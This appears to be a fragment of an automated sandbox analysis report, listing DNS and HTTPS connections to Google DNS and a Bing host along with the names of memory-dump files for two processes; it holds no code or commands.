US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/3544-1-0x00007FFBDADF0000-0x00007FFBDAE00000-memory.dmp

memory/3544-0-0x00007FFBDADF0000-0x00007FFBDAE00000-memory.dmp

memory/3544-2-0x00007FFBDADF0000-0x00007FFBDAE00000-memory.dmp

memory/3544-4-0x00007FFBDADF0000-0x00007FFBDAE00000-memory.dmp

memory/3544-3-0x00007FFBDADF0000-0x00007FFBDAE00000-memory.dmp

memory/3544-5-0x00007FFC1AE0D000-0x00007FFC1AE0E000-memory.dmp

memory/3544-6-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/3544-7-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/3544-10-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/3544-12-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/3544-11-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/3544-13-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/3544-9-0x00007FFBD8AE0000-0x00007FFBD8AF0000-memory.dmp

memory/3544-15-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/3544-14-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/3544-21-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/3544-18-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/3544-17-0x00007FFBD8AE0000-0x00007FFBD8AF0000-memory.dmp

memory/3544-16-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/3544-8-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/3544-20-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/3544-22-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/3544-19-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/2828-44-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/2828-46-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/2828-48-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/2828-49-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/2828-47-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/2828-54-0x00007FF6DFF10000-0x00007FF6DFF18000-memory.dmp

memory/3544-58-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/2828-59-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp

memory/3544-84-0x00007FFBDADF0000-0x00007FFBDAE00000-memory.dmp

memory/3544-86-0x00007FFBDADF0000-0x00007FFBDAE00000-memory.dmp

memory/3544-87-0x00007FFBDADF0000-0x00007FFBDAE00000-memory.dmp

memory/3544-85-0x00007FFBDADF0000-0x00007FFBDAE00000-memory.dmp

memory/3544-88-0x00007FFC1AD70000-0x00007FFC1AF65000-memory.dmp